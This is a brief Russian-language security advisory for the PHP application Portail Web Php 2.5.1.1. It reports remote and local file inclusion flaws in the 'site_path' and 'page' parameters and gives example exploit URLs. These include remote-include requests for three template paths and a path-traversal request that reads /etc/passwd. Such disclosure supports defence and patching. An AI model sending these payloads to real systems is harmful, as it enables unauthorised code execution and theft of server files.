Программа: Portail Web Php 2.5.1.1
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре «site_path» сценарием index.php и в параметре «page». Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера.
Пример:
I- Remote File Inclusion
/PwP2.5.1.1/template/Vert/index.php?site_path=http://localhost/020.txt
/PwP2.5.1.1/template/Noir/index.php?site_path=http://localhost/020.txt
/PwP2.5.1.1/template/Bleu/index.php?site_path=http://localhost/020.txt
II- Local File Inclusion
/PwP2.5.1.1/?page=../../../../../../../../etc/passwd
